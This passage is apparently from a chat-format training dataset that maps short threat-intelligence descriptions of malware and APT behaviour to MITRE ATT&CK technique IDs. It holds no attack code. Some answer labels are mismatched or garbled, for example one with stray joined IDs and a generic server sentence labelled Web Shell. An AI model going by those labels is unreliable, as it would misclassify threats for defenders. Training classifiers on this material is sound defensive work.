- "content": "The malware tries to delete the shadow copies two times, once before crypting the files in the infected system and secondly after crypting them"
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Small Sieve can only execute correctly if the word `Platypus` is passed to it on the command line."
- },
- {
- "role": "assistant",
- "content": "T1480 - Execution Guardrails"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QUADAGENT has a command to delete its Registry key and scheduled task."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "downloads and uploads files on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can find a process owned by a specific user and impersonate the associated token."
- },
- {
- "role": "assistant",
- "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. With a successful connection, it will send the word \"almond\" The server should reply either with \"who\" or \"ice. The RAT will answer the \"who\" command with a string that contains the username, computer name and the previously generated UUID. The \"ice\" command simply makes the RAT finish the connection procedure. This is responsible for the interpretation and execution of the C2 commands. The available commands are"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has searched for information on the target company's website."
- },
- {
- "role": "assistant",
- "content": "T1594 - Search Victim-Owned Websites"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RawPOS dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "appears to have functionality to modify remote Registry information."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nefilim reads the hosts file (C:\\Windows\\System32\\drivers\\etc\\hosts) to get a listing of other systems by IP addresses and hostnames on the network that may be used for Lateral Movement from the current system."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The reconnaissance modules used with can collect information on network configuration."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper delivered malicious documents with the XLSX extension, typically used by OpenXML documents, but the file itself was actually an OLE (XLS) document."
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "cUpdateCheckers.bat is launched and creates a scheduled task for GoogleUpdateschecker.vbs persistence"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot has the ability to use the command shell to execute commands on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Meteor can use Wevtutil to remove Security, System and Application Event Viewer logs."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silence can create, delete, or modify a specified Registry key or value."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors compromised web servers to use for C2."
- },
- {
- "role": "assistant",
- "content": "T1584.004 - Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 8 shows the network communication of the Pause.ps1 download"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 uses fast flux, a DNS technique used to mask botnets by quickly shifting among compromised hosts, which allows cybercriminals to delay or evade detection. The domains the group has been using to distribute payloads were usually resolved across a lot of IPs"
- },
- {
- "role": "assistant",
- "content": "T1568.001 - Fast Flux DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dridex has used the \"OutputDebugStringW\" function to avoid malware analysis as part of its anti-debugging technique."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can gather the victim computer name and serial number."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 added their own devices as allowed IDs for active sync using \"Set-CASMailbox\", allowing it to obtain copies of victim mailboxes. It also added additional permissions (such as Mail.Read and Mail.ReadWrite) to compromised Application or Service Principals."
- },
- {
- "role": "assistant",
- "content": "T1098.002 - Account Manipulation: Additional Email Delegate Permissions"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT has the ability to list files upon receiving the \"ls\" command from C2."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 leveraged Sysmon to understand the processes, services in the organization."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "boom! Deletes GID.bin, ShwDoc.VBS and ShwDoc.srv files, as well as the scheduled task whose name a GUID stored in the GID.bin file"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Linux version of Derusbi checks if the victim user ID is anything other than zero (normally used for root), and the malware will not execute if it does not have root privileges. Derusbi also gathers the username of the victim."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Babuk can stop anti-virus services on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has deleted itself from the system after execution."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It is a preferred platform within data centers and the cloud for businesses, as well as an ongoing favorite when it comes to a majority of Internet-facing web and application servers"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A recent Lokibot campaign has been spotted, which made use of a tunneling service to spread the malware. According to My Online Security, threat actors behind this campaign leveraged a service known as Ngrok. As claimed on the website, Ngrok reveals servers in NATs and Firewalls over secure tunnels. Hence, the service acted as a direct tunnel or a VPN which the actors exploited to push the malware through spam emails"
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silence has injected a DLL library containing a Trojan into the fwmain32.exe process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has used steganography to hide stolen data inside other files stored on Github."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can collect information related to a compromised host, including OS version and a list of drives."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed can pull a timestamp from the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has sent malicious Word OLE compound documents to victims."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stealth Falcon malware communicates with its C2 server via HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete has used TLS-encrypted FTP to exfiltrate data."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX_OCEANLOTUS.D can use HTTP POST and GET requests to send and receive C2 information."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to write random data across a file and delete it."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "sent spear phishing emails containing links to .hta files."
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AuditCred encrypts the configuration."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilBunny has used WMI to gather information about the system."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gazer stores configuration items in alternate data streams (ADSs) if the Registry is not accessible."
- },
- {
- "role": "assistant",
- "content": "T1564.004 - Hide Artifacts: NTFS File Attributes"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER may collect information about the currently logged in user by running \"whoami\" on a victim."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FinFisher extracts and decrypts stage 3 malware, which is stored in encrypted resources."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The CAB file contains the following files and functions: dll: A malicious DLL used to launch batch files (used with cliconfg.exe for UAC bypass)"
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TinyTurla can use HTTPS in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "With this approach, the attacker ensures that there is no direct execution (the executable is executed thanks to scheduled tasks), there's no download of an additional payload, and finally, the author uses the fact that the docx format is an archive in order to include its executable (GravityRAT"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TDTESS creates then deletes log files during installation of itself as a service."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Helminth config file is encrypted with RC4."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has been observed using a hard coded list of passwords to brute force user accounts."
- },
- {
- "role": "assistant",
- "content": "T1110.001 - Brute Force: Password Guessing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A version of PlugX loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application control techniques."
- },
- {
- "role": "assistant",
- "content": "T1127.001 - Trusted Developer Utilities Proxy Execution: MSBuild"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. The next-stage malware can best be described as a malicious file corrupter. Once executed in memory, the corrupter locates files in certain directories on the system with one of the following hardcoded file extensions"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "identifies and kills anti-malware processes."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stealth Falcon malware encrypts C2 traffic using RC4 with a hard-coded key."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 can enumerate network adapter information."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. In the case of file 8892279f3. the remote location is http://185.203.119[.]184/Dropbox/request. and only continues if the file exists. 2) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. The content of both files is shown in the appendix section of this report. and only continues if the file exists"
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Throughout the years, Kimsuky has been using an array of malware in their operations. The infrastructure of some of the malware used by Kimsuky can be tracked using pattern analysis of the URI structures used by some of their tools. The following table maps commonly observed URI patterns to their respective malware"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Recently, Falcon Intelligence observed new activity from MUSTANG PANDA, using a unique infection chain to target likely Mongolia-based victims. This newly observed activity uses a series of redirections and fileless, malicious implementations of legitimate tools to gain access to the targeted systems. Additionally, MUSTANG PANDA actors reused previously-observed legitimate domains to host files"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec is capable of using DNS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak has the ability to identify the domain and the MAC and IP addresses of an infected machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MURKYTOP has the capability to delete local files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard has searched for private keys in .ssh."
- },
- {
- "role": "assistant",
- "content": "T1552.004 - Unsecured Credentials: Private Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LookBack can take desktop screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ftp may be used to exfiltrate data separate from the main command and control protocol."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PolyglotDuke can retrieve payloads from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "performs BIOS modification and can download and execute a file as well as protect itself from removal."
- },
- {
- "role": "assistant",
- "content": "T1542.001 - Pre-OS Boot: System Firmware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RCSession can use an encrypted beacon to check in with C2."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IronNetInjector is made of an IronPython script that contains a .NET injector and one or more payloads. The payloads can be also .NET assemblies (x86/64) or native PEs (x86/64). When an IronPython script is run, the .NET injector gets loaded, which in turn injects the payload(s) into its own or a remote process"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "registers itself as a service by adding several Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MechaFlounder uses a python-based payload."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has attempted to get users to execute malware via social media and spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This spawns the hidden embedded malicious LNK file in the document"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Honeybee uses a batch file that configures the ComSysApp service to autostart in order to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
